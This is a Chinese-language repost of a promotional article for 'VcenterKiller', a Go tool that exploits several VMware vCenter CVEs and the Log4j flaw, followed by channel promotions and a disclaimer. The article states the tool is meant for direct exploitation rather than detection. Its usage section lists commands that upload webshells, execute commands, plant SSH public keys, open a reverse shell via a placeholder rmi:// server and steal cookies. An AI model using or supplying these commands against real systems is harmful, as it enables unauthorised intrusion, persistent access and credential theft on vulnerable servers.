一款针对Vcenter的综合利用工具
2022-10-28 10:10:40 Author: 渗透安全团队(查看原文) 阅读量:52 收藏

工具介绍

一款针对Vcenter的综合利用工具,包含目前最主流的CVE-2021-21972、CVE-2021-21985以及CVE-2021-22005,提供一键上传webshell,命令执行或者上传公钥并使用SSH连接的功能,以及针对Apache Log4j CVE-2021-44228漏洞在Vcenter上的检测以及利用,比如命令执行并获取回显(需要一个ldap恶意服务器),现在不需要另外启动ldap服务器了,我根据jndi-injection工具手搓了一个利用方式,Vcenter使用的中间件是Tomcat,直接使用TomcatBypass的利用链就行了。

应用场景

一般Vcenter都放在内网,并且漏洞特征也都是烂大街,像什么fscan啦一扫就出来了,那么VcenterKiller就不是用来检测目标是否存在漏洞的,而是直接尝试利用,一般通过CS/MSF在跳板上来执行,所以去掉了其余花里胡哨的输出

使用方法

go build -o main.exe
./main.exe -u https://192.168.1.1 -m 21985 -c whoami./main.exe -u https://192.168.1.1 -m 22005 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f test.jsp./main.exe -u https://192.168.1.1 -m 21972 -f id_rsa.pub -t ssh //传公钥./main.exe -u https://192.168.1.1 -m 21985 -t rshell -r rmi://xx.xx.xx.xx:1099/xx./main.exe -u https://192.168.1.1 -m log4center -t scan // scan log4j./main.exe -u https://192.168.1.1 -m log4center -t exec -r ldap://xx.xx.xx.xx:1389 -c whoami //也可以不指定ldap服务./main.exe -u https://xx.xx.com -m 22954 whoami./main.exe -u https://xx.xx.com -m 22972 //get cookie./main.exe -u https://xx.xx.com -m 31656 //If CVE-2022-22972不能用就换CVE-2022-31656

下载地址

1、通过阅读原文,到项目地址下载

星 球 免 费 福 利

 转发公众号本文到朋友圈

 截图到公众号后台第1、3、5名获取免费进入星球

星球的最近主题和星球内部工具一些展示

欢 迎 加 入 星 球 !

关 注 有 礼

关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。

 还在等什么?赶紧点击下方名片关注学习吧!


群聊 | 技术交流群-群除我佬

干货|史上最全一句话木马

干货 | CS绕过vultr特征检测修改算法

实战 | 用中国人写的红队服务器搞一次内网穿透练习

实战 | 渗透某培训平台经历

实战 | 一次曲折的钓鱼溯源反制

免责声明
由于传播、利用本公众号渗透安全团队所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号渗透安全团队及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!
好文分享收藏赞一下最美点在看哦

文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247494003&idx=1&sn=2fb128eee2c1a742faa3bc812ae467d8&chksm=c17614dcf6019dcaa8cb6c76c589d455bb4d6ef2c3acbb7ba2876daed1c3a13431629c723ef7#rd
如有侵权请联系:admin#unsafe.sh